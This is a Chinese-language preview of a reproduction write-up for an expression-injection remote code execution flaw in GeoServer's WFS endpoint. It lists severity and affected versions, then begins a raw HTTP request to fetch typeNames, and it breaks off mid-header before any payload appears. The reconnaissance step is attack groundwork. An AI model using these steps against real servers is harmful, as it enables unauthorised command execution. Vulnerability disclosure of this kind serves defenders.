文章预览
0x01 前言 GeoServer在 / geoserver /wfs接口处发现了一个表达式注入致命令执行漏洞 ,攻击者可在目标主机执行任意命令,获取服务器权限 。 0x02 漏洞等级 高危 0x03 漏洞影响 2.25.0 < = GeoServer < 2.25.2 2.24.0 < = GeoServer < 2.24.4 GeoServer < 2.23.6 0x04 漏洞复现 界面是这个样子~~~ 先 获取 typeNames的值 : GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage?0 HTTP/1.1 Host : ip:port Cookie : JSESSIONID=AB2F8C76E7916F04C50769AAE33090F6; JSESSIONID=D6ED95BAAAE93C084E40493BF45BB23B User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding : gzip, deflate Upgrade-Insecure-Requests : 1 Sec-Fetch-Dest : document Sec-Fetch-Mode : navigat
………………………………